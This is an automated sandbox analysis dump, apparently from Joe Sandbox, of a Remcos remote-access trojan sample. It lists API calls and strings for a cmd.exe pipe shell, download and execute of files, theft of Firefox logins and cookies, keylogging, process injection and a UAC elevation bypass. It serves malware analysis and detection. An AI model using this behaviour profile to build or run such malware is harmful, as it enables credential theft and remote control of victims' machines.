                                                                                                                                                                                      • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                                                                                                      • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                                                                                                      • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                                                                                                      • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                                                                                                      • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002E0,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                      • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                                                                      • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                                                                      • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                                                                      • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                                                                      • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                      • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(000002F4,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                                                                      • Part of subcall function 00404468: SetEvent.KERNEL32(000002F4,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                                                                                                      • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                                                                      • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                                                      • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                                                                                                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                                                                                                      • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                                                                                                    • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                                                                                                    • API String ID: 2918587301-599666313
                                                                                                                                                                                    • Opcode ID: 08581f0918d38c8bd5f313b85e42522b921d7490a52977c49e3bb19188966566
                                                                                                                                                                                    • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                                                                                                                    • Opcode Fuzzy Hash: 08581f0918d38c8bd5f313b85e42522b921d7490a52977c49e3bb19188966566
                                                                                                                                                                                    • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                                                                                                      • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                                                                                      • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002E0,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                                                                                                    • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                                                                                                    • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                                                                                                      • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                                                                                      • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                                                                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                                                                                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                                                                                      • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                                                                                                    • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                                                    • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                                                                                                    • API String ID: 3815868655-81343324
                                                                                                                                                                                    • Opcode ID: c5c25fea02136d832433109724d9b2fd2cfe10b9d582a035314f1e06b45d0376
                                                                                                                                                                                    • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                                                                                                    • Opcode Fuzzy Hash: c5c25fea02136d832433109724d9b2fd2cfe10b9d582a035314f1e06b45d0376
                                                                                                                                                                                    • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                                                                                      • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                      • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                      • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                                                                                      • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                                      • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                                      • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                                                                                      • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                                                                                    • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                                                                                                    • API String ID: 65172268-860466531
                                                                                                                                                                                    • Opcode ID: 6bb724df5b67df371780ca0b8c3fa9dacbf220518a995c3a182ab50fa5fe6213
                                                                                                                                                                                    • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6bb724df5b67df371780ca0b8c3fa9dacbf220518a995c3a182ab50fa5fe6213
                                                                                                                                                                                    • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                                                    • API String ID: 1164774033-3681987949
                                                                                                                                                                                    • Opcode ID: ed59095b0c91c05816504ef90c2d4b205df4d19eefab90fa6e1eb694d7ca5afe
                                                                                                                                                                                    • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: ed59095b0c91c05816504ef90c2d4b205df4d19eefab90fa6e1eb694d7ca5afe
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$Close$File$FirstNext
                                                                                                                                                                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                    • API String ID: 3527384056-432212279
                                                                                                                                                                                    • Opcode ID: fab34acc97d4a6335b625775edcc8d33fe984972a39f1cf92b4fd4d046e71b0a
                                                                                                                                                                                    • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                                                                                                    • Opcode Fuzzy Hash: fab34acc97d4a6335b625775edcc8d33fe984972a39f1cf92b4fd4d046e71b0a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                                                                                      • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                      • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                      • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                                                                                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                                                                                                    • API String ID: 726551946-3025026198
                                                                                                                                                                                    • Opcode ID: 41470707ce2cf1d296282bdd86645310f2a90acdf384f79c6299c5c0c6affc21
                                                                                                                                                                                    • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                                                                                                    • Opcode Fuzzy Hash: 41470707ce2cf1d296282bdd86645310f2a90acdf384f79c6299c5c0c6affc21
                                                                                                                                                                                    • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0$1$2$3$4$5$6$7
                                                                                                                                                                                    • API String ID: 0-3177665633
                                                                                                                                                                                    • Opcode ID: dc3d60b63999588b41a60ffc37880a3031f904f50fb3e0113cd6e02121726fea
                                                                                                                                                                                    • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                                                                                                    • Opcode Fuzzy Hash: dc3d60b63999588b41a60ffc37880a3031f904f50fb3e0113cd6e02121726fea
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                                                    • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                                                    • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                                                    • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                                                                                                    • ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                                                                    • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                                                                    • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                                                    • String ID: 8[G
                                                                                                                                                                                    • API String ID: 1888522110-1691237782
                                                                                                                                                                                    • Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                                                                                                    • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                                                                                                    • Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                                                                                                    • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00406788
                                                                                                                                                                                    • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Object_wcslen
                                                                                                                                                                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                                                    • API String ID: 240030777-3166923314
                                                                                                                                                                                    • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                                                                                                    • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                                                                                                    • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                                                                                                    • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                                                                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00419935
                                                                                                                                                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3587775597-0
                                                                                                                                                                                    • Opcode ID: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                                                                                                    • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                                                                                                                      • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2341273852-0
                                                                                                                                                                                    • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                                                                                                    • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                                                                                                    • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                                                                                                                      • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Find$CreateFirstNext
                                                                                                                                                                                    • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                                                                                                    • API String ID: 341183262-3780268858
                                                                                                                                                                                    • Opcode ID: d888b96030b54da055a208261f198eee06433eb1d16a51921b03b151a89bb74f
